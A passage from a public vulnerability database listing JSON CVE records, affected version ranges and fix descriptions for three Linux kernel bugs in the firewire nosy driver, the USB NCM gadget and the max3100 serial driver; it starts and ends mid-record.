              "version": "286468210d83ce0ca1e37e346ed9f4457a161650",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/firewire/nosy.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "2.6.36"
            },
            {
              "lessThan": "2.6.36",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.314",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.276",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.217",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.159",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.91",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.31",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.10",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.314",
                  "versionStartIncluding": "2.6.36",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.276",
                  "versionStartIncluding": "2.6.36",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.217",
                  "versionStartIncluding": "2.6.36",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.159",
                  "versionStartIncluding": "2.6.36",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.91",
                  "versionStartIncluding": "2.6.36",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.31",
                  "versionStartIncluding": "2.6.36",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.10",
                  "versionStartIncluding": "2.6.36",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "2.6.36",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nfirewire: nosy: ensure user_length is taken into account when fetching packet contents\n\nEnsure that packet_buffer_get respects the user_length provided. If\nthe length of the head packet exceeds the user_length, packet_buffer_get\nwill now return 0 to signify to the user that no data were read\nand a larger buffer size is required. Helps prevent user space overflows."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-01-05T10:35:14.529Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/67f34f093c0f7bf33f5b4ae64d3d695a3b978285"
        },
        {
          "url": "https://git.kernel.org/stable/c/7b8c7bd2296e95b38a6ff346242356a2e7190239"
        },
        {
          "url": "https://git.kernel.org/stable/c/cca330c59c54207567a648357835f59df9a286bb"
        },
        {
          "url": "https://git.kernel.org/stable/c/79f988d3ffc1aa778fc5181bdfab312e57956c6b"
        },
        {
          "url": "https://git.kernel.org/stable/c/4ee0941da10e8fdcdb34756b877efd3282594c1f"
        },
        {
          "url": "https://git.kernel.org/stable/c/1fe60ee709436550f8cfbab01295936b868d5baa"
        },
        {
          "url": "https://git.kernel.org/stable/c/539d51ac48bcfcfa1b3d4a85f8df92fa22c1d41c"
        },
        {
          "url": "https://git.kernel.org/stable/c/38762a0763c10c24a4915feee722d7aa6e73eb98"
        }
      ],
      "title": "firewire: nosy: ensure user_length is taken into account when fetching packet contents",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-27401",
    "datePublished": "2024-05-13T10:29:53.862Z",
    "dateReserved": "2024-02-25T13:47:42.681Z",
    "dateUpdated": "2026-01-05T10:35:14.529Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-35825 (GCVE-0-2024-35825)

Vulnerability from cvelistv5 – Published: 2024-05-17 13:27 – Updated: 2025-05-04 12:55

Title

usb: gadget: ncm: Fix handling of zero block length packets

Summary

In the Linux kernel, the following vulnerability has been resolved: usb: gadget: ncm: Fix handling of zero block length packets While connecting to a Linux host with CDC_NCM_NTB_DEF_SIZE_TX set to 65536, it has been observed that we receive short packets, which come at interval of 5-10 seconds sometimes and have block length zero but still contain 1-2 valid datagrams present. According to the NCM spec: "If wBlockLength = 0x0000, the block is terminated by a short packet. In this case, the USB transfer must still be shorter than dwNtbInMaxSize or dwNtbOutMaxSize. If exactly dwNtbInMaxSize or dwNtbOutMaxSize bytes are sent, and the size is a multiple of wMaxPacketSize for the given pipe, then no ZLP shall be sent. wBlockLength= 0x0000 must be used with extreme care, because of the possibility that the host and device may get out of sync, and because of test issues. wBlockLength = 0x0000 allows the sender to reduce latency by starting to send a very large NTB, and then shortening it when the sender discovers that there’s not sufficient data to justify sending a large NTB" However, there is a potential issue with the current implementation, as it checks for the occurrence of multiple NTBs in a single giveback by verifying if the leftover bytes to be processed is zero or not. If the block length reads zero, we would process the same NTB infintely because the leftover bytes is never zero and it leads to a crash. Fix this by bailing out if block length reads zero.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/e2dbfea520e60d58e…
	https://git.kernel.org/stable/c/a766761d206e7c36d…
	https://git.kernel.org/stable/c/ef846cdbd100f7f9d…
	https://git.kernel.org/stable/c/92b051b87658df764…
	https://git.kernel.org/stable/c/7664ee8bd80309b90…
	https://git.kernel.org/stable/c/a0f77b5d6067285b8…
	https://git.kernel.org/stable/c/6b2c73111a2522638…
	https://git.kernel.org/stable/c/f90ce1e04cbcc7663…

Impacted products

Vendor

Product

Version

Linux

Affected: ff3ba016263ee93a1c6209bf5ab1599de7ab1512 , < e2dbfea520e60d58e0c498ba41bde10452257779 (git)
Affected: e7ca00f35d8a17af1ae19d529193ebc21bfda164 , < a766761d206e7c36d7526e0ae749949d17ca582c (git)
Affected: 17c653d4913bbc50d284aa96cf12bfc63e41ee5c , < ef846cdbd100f7f9dc045e8bcd7fe4b3a3713c03 (git)
Affected: 7014807fb7efa169a47a7a0a0a41d2c513925de0 , < 92b051b87658df7649ffcdef522593f21a2b296b (git)
Affected: 49fbc18378ae72a47feabee97fdb86f3cea09765 , < 7664ee8bd80309b90d53488b619764f0a057f2b7 (git)
Affected: 427694cfaafa565a3db5c5ea71df6bc095dca92f , < a0f77b5d6067285b8eca0ee3bd1e448a6258026f (git)
Affected: 427694cfaafa565a3db5c5ea71df6bc095dca92f , < 6b2c73111a252263807b7598682663dc33aa4b4c (git)
Affected: 427694cfaafa565a3db5c5ea71df6bc095dca92f , < f90ce1e04cbcc76639d6cba0fdbd820cd80b3c70 (git)
Affected: 5bdf93a2f5459f944b416b188178ca4a92fd206f (git)
Affected: 4bf1a9d20c65b9e80ca4b171267103f8d4f2c61f (git)

Linux

Affected: 6.6
Unaffected: 0 , < 6.6 (semver)
Unaffected: 4.19.312 , ≤ 4.19.* (semver)
Unaffected: 5.4.274 , ≤ 5.4.* (semver)
Unaffected: 5.10.215 , ≤ 5.10.* (semver)
Unaffected: 5.15.154 , ≤ 5.15.* (semver)
Unaffected: 6.1.84 , ≤ 6.1.* (semver)
Unaffected: 6.6.24 , ≤ 6.6.* (semver)
Unaffected: 6.7.12 , ≤ 6.7.* (semver)
Unaffected: 6.8 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T03:21:47.690Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/e2dbfea520e60d58e0c498ba41bde10452257779"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/a766761d206e7c36d7526e0ae749949d17ca582c"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/ef846cdbd100f7f9dc045e8bcd7fe4b3a3713c03"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/92b051b87658df7649ffcdef522593f21a2b296b"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/7664ee8bd80309b90d53488b619764f0a057f2b7"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/a0f77b5d6067285b8eca0ee3bd1e448a6258026f"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/6b2c73111a252263807b7598682663dc33aa4b4c"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/f90ce1e04cbcc76639d6cba0fdbd820cd80b3c70"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-35825",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T15:42:28.954371Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:33:21.446Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/usb/gadget/function/f_ncm.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "e2dbfea520e60d58e0c498ba41bde10452257779",
              "status": "affected",
              "version": "ff3ba016263ee93a1c6209bf5ab1599de7ab1512",
              "versionType": "git"
            },
            {
              "lessThan": "a766761d206e7c36d7526e0ae749949d17ca582c",
              "status": "affected",
              "version": "e7ca00f35d8a17af1ae19d529193ebc21bfda164",
              "versionType": "git"
            },
            {
              "lessThan": "ef846cdbd100f7f9dc045e8bcd7fe4b3a3713c03",
              "status": "affected",
              "version": "17c653d4913bbc50d284aa96cf12bfc63e41ee5c",
              "versionType": "git"
            },
            {
              "lessThan": "92b051b87658df7649ffcdef522593f21a2b296b",
              "status": "affected",
              "version": "7014807fb7efa169a47a7a0a0a41d2c513925de0",
              "versionType": "git"
            },
            {
              "lessThan": "7664ee8bd80309b90d53488b619764f0a057f2b7",
              "status": "affected",
              "version": "49fbc18378ae72a47feabee97fdb86f3cea09765",
              "versionType": "git"
            },
            {
              "lessThan": "a0f77b5d6067285b8eca0ee3bd1e448a6258026f",
              "status": "affected",
              "version": "427694cfaafa565a3db5c5ea71df6bc095dca92f",
              "versionType": "git"
            },
            {
              "lessThan": "6b2c73111a252263807b7598682663dc33aa4b4c",
              "status": "affected",
              "version": "427694cfaafa565a3db5c5ea71df6bc095dca92f",
              "versionType": "git"
            },
            {
              "lessThan": "f90ce1e04cbcc76639d6cba0fdbd820cd80b3c70",
              "status": "affected",
              "version": "427694cfaafa565a3db5c5ea71df6bc095dca92f",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "5bdf93a2f5459f944b416b188178ca4a92fd206f",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "4bf1a9d20c65b9e80ca4b171267103f8d4f2c61f",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/usb/gadget/function/f_ncm.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "6.6"
            },
            {
              "lessThan": "6.6",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.312",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.274",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.215",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.154",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.84",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.24",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.7.*",
              "status": "unaffected",
              "version": "6.7.12",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.8",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.312",
                  "versionStartIncluding": "4.19.297",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.274",
                  "versionStartIncluding": "5.4.259",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.215",
                  "versionStartIncluding": "5.10.199",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.154",
                  "versionStartIncluding": "5.15.136",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.84",
                  "versionStartIncluding": "6.1.59",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.24",
                  "versionStartIncluding": "6.6",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.7.12",
                  "versionStartIncluding": "6.6",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8",
                  "versionStartIncluding": "6.6",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "4.14.328",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "6.5.8",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nusb: gadget: ncm: Fix handling of zero block length packets\n\nWhile connecting to a Linux host with CDC_NCM_NTB_DEF_SIZE_TX\nset to 65536, it has been observed that we receive short packets,\nwhich come at interval of 5-10 seconds sometimes and have block\nlength zero but still contain 1-2 valid datagrams present.\n\nAccording to the NCM spec:\n\n\"If wBlockLength = 0x0000, the block is terminated by a\nshort packet. In this case, the USB transfer must still\nbe shorter than dwNtbInMaxSize or dwNtbOutMaxSize. If\nexactly dwNtbInMaxSize or dwNtbOutMaxSize bytes are sent,\nand the size is a multiple of wMaxPacketSize for the\ngiven pipe, then no ZLP shall be sent.\n\nwBlockLength= 0x0000 must be used with extreme care, because\nof the possibility that the host and device may get out of\nsync, and because of test issues.\n\nwBlockLength = 0x0000 allows the sender to reduce latency by\nstarting to send a very large NTB, and then shortening it when\nthe sender discovers that there\u2019s not sufficient data to justify\nsending a large NTB\"\n\nHowever, there is a potential issue with the current implementation,\nas it checks for the occurrence of multiple NTBs in a single\ngiveback by verifying if the leftover bytes to be processed is zero\nor not. If the block length reads zero, we would process the same\nNTB infintely because the leftover bytes is never zero and it leads\nto a crash. Fix this by bailing out if block length reads zero."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T12:55:50.991Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/e2dbfea520e60d58e0c498ba41bde10452257779"
        },
        {
          "url": "https://git.kernel.org/stable/c/a766761d206e7c36d7526e0ae749949d17ca582c"
        },
        {
          "url": "https://git.kernel.org/stable/c/ef846cdbd100f7f9dc045e8bcd7fe4b3a3713c03"
        },
        {
          "url": "https://git.kernel.org/stable/c/92b051b87658df7649ffcdef522593f21a2b296b"
        },
        {
          "url": "https://git.kernel.org/stable/c/7664ee8bd80309b90d53488b619764f0a057f2b7"
        },
        {
          "url": "https://git.kernel.org/stable/c/a0f77b5d6067285b8eca0ee3bd1e448a6258026f"
        },
        {
          "url": "https://git.kernel.org/stable/c/6b2c73111a252263807b7598682663dc33aa4b4c"
        },
        {
          "url": "https://git.kernel.org/stable/c/f90ce1e04cbcc76639d6cba0fdbd820cd80b3c70"
        }
      ],
      "title": "usb: gadget: ncm: Fix handling of zero block length packets",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-35825",
    "datePublished": "2024-05-17T13:27:28.914Z",
    "dateReserved": "2024-05-17T12:19:12.347Z",
    "dateUpdated": "2025-05-04T12:55:50.991Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-38634 (GCVE-0-2024-38634)

Vulnerability from cvelistv5 – Published: 2024-06-21 10:18 – Updated: 2025-11-04 17:21

Title

serial: max3100: Lock port->lock when calling uart_handle_cts_change()

Summary

In the Linux kernel, the following vulnerability has been resolved: serial: max3100: Lock port->lock when calling uart_handle_cts_change() uart_handle_cts_change() has to be called with port lock taken, Since we run it in a separate work, the lock may not be taken at the time of running. Make sure that it's taken by explicitly doing that. Without it we got a splat: WARNING: CPU: 0 PID: 10 at drivers/tty/serial/serial_core.c:3491 uart_handle_cts_change+0xa6/0xb0 ... Workqueue: max3100-0 max3100_work [max3100] RIP: 0010:uart_handle_cts_change+0xa6/0xb0 ... max3100_handlerx+0xc5/0x110 [max3100] max3100_work+0x12a/0x340 [max3100]

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/44b38924135d2093e…
	https://git.kernel.org/stable/c/ea9b35372b58ac293…
	https://git.kernel.org/stable/c/cc121e3722a0a2c8f…
	https://git.kernel.org/stable/c/78dbda51bb4241b88…
	https://git.kernel.org/stable/c/8296bb9e5925b6634…
	https://git.kernel.org/stable/c/93df2fba6c7dfa9a2…
	https://git.kernel.org/stable/c/865b30c8661924ee9…
	https://git.kernel.org/stable/c/77ab53371a2066fdf…

Impacted products

Vendor

Product

Version

Linux

Affected: 7831d56b0a3544cbb6f82f76c34ca95e24d5b676 , < 44b38924135d2093e2ec1812969464845dd66dc9 (git)
Affected: 7831d56b0a3544cbb6f82f76c34ca95e24d5b676 , < ea9b35372b58ac2931bfc1d5bc25e839d1221e30 (git)
Affected: 7831d56b0a3544cbb6f82f76c34ca95e24d5b676 , < cc121e3722a0a2c8f716ef991e5425b180a5fb94 (git)
Affected: 7831d56b0a3544cbb6f82f76c34ca95e24d5b676 , < 78dbda51bb4241b88a52d71620f06231a341f9ba (git)
Affected: 7831d56b0a3544cbb6f82f76c34ca95e24d5b676 , < 8296bb9e5925b6634259c5d4daee88f0cc0884ec (git)
Affected: 7831d56b0a3544cbb6f82f76c34ca95e24d5b676 , < 93df2fba6c7dfa9a2f08546ea9a5ca4728758458 (git)
Affected: 7831d56b0a3544cbb6f82f76c34ca95e24d5b676 , < 865b30c8661924ee9145f442bf32cea549faa869 (git)
Affected: 7831d56b0a3544cbb6f82f76c34ca95e24d5b676 , < 77ab53371a2066fdf9b895246505f5ef5a4b5d47 (git)

Linux

Affected: 2.6.30
Unaffected: 0 , < 2.6.30 (semver)
Unaffected: 4.19.316 , ≤ 4.19.* (semver)
Unaffected: 5.4.278 , ≤ 5.4.* (semver)
Unaffected: 5.10.219 , ≤ 5.10.* (semver)
Unaffected: 5.15.161 , ≤ 5.15.* (semver)
Unaffected: 6.1.93 , ≤ 6.1.* (semver)
Unaffected: 6.6.33 , ≤ 6.6.* (semver)
Unaffected: 6.9.4 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-38634",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-06-21T13:19:09.330989Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-21T13:19:18.846Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-04T17:21:53.204Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/44b38924135d2093e2ec1812969464845dd66dc9"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/ea9b35372b58ac2931bfc1d5bc25e839d1221e30"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/cc121e3722a0a2c8f716ef991e5425b180a5fb94"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/78dbda51bb4241b88a52d71620f06231a341f9ba"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/8296bb9e5925b6634259c5d4daee88f0cc0884ec"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/93df2fba6c7dfa9a2f08546ea9a5ca4728758458"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/865b30c8661924ee9145f442bf32cea549faa869"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/77ab53371a2066fdf9b895246505f5ef5a4b5d47"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/tty/serial/max3100.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "44b38924135d2093e2ec1812969464845dd66dc9",
              "status": "affected",
              "version": "7831d56b0a3544cbb6f82f76c34ca95e24d5b676",
              "versionType": "git"
            },
            {
              "lessThan": "ea9b35372b58ac2931bfc1d5bc25e839d1221e30",
              "status": "affected",
              "version": "7831d56b0a3544cbb6f82f76c34ca95e24d5b676",
              "versionType": "git"
            },
            {
              "lessThan": "cc121e3722a0a2c8f716ef991e5425b180a5fb94",
              "status": "affected",
              "version": "7831d56b0a3544cbb6f82f76c34ca95e24d5b676",
              "versionType": "git"
            },
            {
              "lessThan": "78dbda51bb4241b88a52d71620f06231a341f9ba",
              "status": "affected",
              "version": "7831d56b0a3544cbb6f82f76c34ca95e24d5b676",
              "versionType": "git"
            },
            {
              "lessThan": "8296bb9e5925b6634259c5d4daee88f0cc0884ec",
              "status": "affected",
              "version": "7831d56b0a3544cbb6f82f76c34ca95e24d5b676",
              "versionType": "git"
            },
            {
              "lessThan": "93df2fba6c7dfa9a2f08546ea9a5ca4728758458",
              "status": "affected",
              "version": "7831d56b0a3544cbb6f82f76c34ca95e24d5b676",
              "versionType": "git"
            },
            {
              "lessThan": "865b30c8661924ee9145f442bf32cea549faa869",
              "status": "affected",
              "version": "7831d56b0a3544cbb6f82f76c34ca95e24d5b676",
              "versionType": "git"
            },
            {
              "lessThan": "77ab53371a2066fdf9b895246505f5ef5a4b5d47",
              "status": "affected",
              "version": "7831d56b0a3544cbb6f82f76c34ca95e24d5b676",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/tty/serial/max3100.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "2.6.30"
            },
            {
              "lessThan": "2.6.30",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.316",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.278",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.219",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.161",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.93",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.33",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.4",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.316",
                  "versionStartIncluding": "2.6.30",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.278",
                  "versionStartIncluding": "2.6.30",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.219",
                  "versionStartIncluding": "2.6.30",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.161",
                  "versionStartIncluding": "2.6.30",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.93",
                  "versionStartIncluding": "2.6.30",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.33",
                  "versionStartIncluding": "2.6.30",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.4",
                  "versionStartIncluding": "2.6.30",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "2.6.30",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
